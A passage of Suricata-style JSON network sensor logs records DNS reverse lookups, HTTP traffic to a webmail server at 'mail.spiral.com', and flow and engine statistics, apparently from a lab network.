{"timestamp":"2020-02-29T00:08:55.311909+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17907,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:55.580883+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875}} {"timestamp":"2020-02-29T00:08:58.000694+0000","flow_id":642560046543245,"event_type":"flow","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3083,"bytes_toclient":18004,"start":"2020-02-29T00:07:46.405901+0000","end":"2020-02-29T00:07:57.100953+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:59.842681+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43765,"tx_id":0}} {"timestamp":"2020-02-29T00:08:59.853060+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19807,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.000117+0000","event_type":"stats","stats":{"uptime":14192,"capture":{"kernel_packets":134094,"kernel_drops":0},"decoder":{"pkts":134112,"bytes":92665607,"invalid":184,"ipv4":132645,"ipv6":8,"ethernet":134112,"raw":0,"null":0,"sll":0,"tcp":127476,"udp":4970,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2267,"failed_udp":110},"tx":{"http":4564,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2346}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20502,"memcap_state":0,"memcap_global":0},"http":{"memuse":92699,"memcap":0}}} {"timestamp":"2020-02-29T00:09:00.000475+0000","flow_id":158826455069850,"event_type":"flow","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:59.357530+0000","end":"2020-02-29T00:03:59.469367+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:00.019586+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:09:00.292803+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} {"timestamp":"2020-02-29T00:09:00.304656+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39008,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:09:01.000220+0000","flow_id":1832429181487928,"event_type":"flow","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:00.084792+0000","end":"2020-02-29T00:04:00.190190+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:05.483487+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":2}} {"timestamp":"2020-02-29T00:09:06.448779+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23974,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.465234+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28746,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.763752+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127}} {"timestamp":"2020-02-29T00:09:06.849661+0000","flow_id":1096924642080953,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:09:06.858247+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55420,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:07.000198+0000","event_type":"stats","stats":{"uptime":14199,"capture":{"kernel_packets":134141,"kernel_drops":0},"decoder":{"pkts":134146,"bytes":92679633,"invalid":184,"ipv4":132675,"ipv6":8,"ethernet":134146,"raw":0,"null":0,"sll":0,"tcp":127502,"udp":4974,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2269,"failed_udp":110},"tx":{"http":4566,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2348}},"flow_mgr":{"closed_pruned":2707,"new_pruned":15,"est_pruned":2319,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":54407,"memcap":0}}} {"timestamp":"2020-02-29T00:09:07.001323+0000","flow_id":1073078963949837,"event_type":"flow","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:06.676109+0000","end":"2020-02-29T00:04:06.787475+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:08.000523+0000","flow_id":1274951032280348,"event_type":"flow","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1056,"start":"2020-02-29T00:08:02.038172+0000","end":"2020-02-29T00:08:07.254988+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:10.000529+0000","flow_id":1197830584211840,"event_type":"flow","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:09.268672+0000","end":"2020-02-29T00:04:09.374158+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:10.345020+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61178,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:09:11.000542+0000","flow_id":1451800606154932,"event_type":"flow","src_ip":"192.168.10.81","src_port":52702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":128,"bytes_toclient":74,"start":"2020-02-29T00:08:10.925876+0000","end":"2020-02-29T00:08:10.926127+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"16","tcp_flags_ts":"06","tcp_flags_tc":"12","syn":true,"rst":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:11.001968+0000","flow_id":1684033767133257,"event_type":"flow","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:10.577609+0000","end":"2020-02-29T00:04:10.689883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:11.764976+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30701,"tx_id":0}} {"timestamp":"2020-02-29T00:09:11.000848+0000","flow_id":1066967241298197,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:09:12.622045+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:12.821690+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336}} {"timestamp":"2020-02-29T00:09:13.002042+0000","flow_id":1066967241298197,"event_type":"flow","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":21,"bytes_toserver":2524,"bytes_toclient":19141,"start":"2020-02-29T00:08:07.954645+0000","end":"2020-02-29T00:08:10.923602+0000","age":3,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:14.000277+0000","event_type":"stats","stats":{"uptime":14206,"capture":{"kernel_packets":134195,"kernel_drops":0},"decoder":{"pkts":134204,"bytes":92704354,"invalid":185,"ipv4":132733,"ipv6":8,"ethernet":134204,"raw":0,"null":0,"sll":0,"tcp":127551,"udp":4982,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2730,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2746,"synack":2737,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1771,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2273,"failed_udp":110},"tx":{"http":4569,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2352}},"flow_mgr":{"closed_pruned":2709,"new_pruned":15,"est_pruned":2322,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":2,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":76072,"memcap":0}}} {"timestamp":"2020-02-29T00:09:14.001007+0000","flow_id":1835650407822727,"event_type":"flow","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.095623+0000","end":"2020-02-29T00:04:13.201001+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001181+0000","flow_id":1842054204037946,"event_type":"flow","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.858938+0000","end":"2020-02-29T00:04:13.964382+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 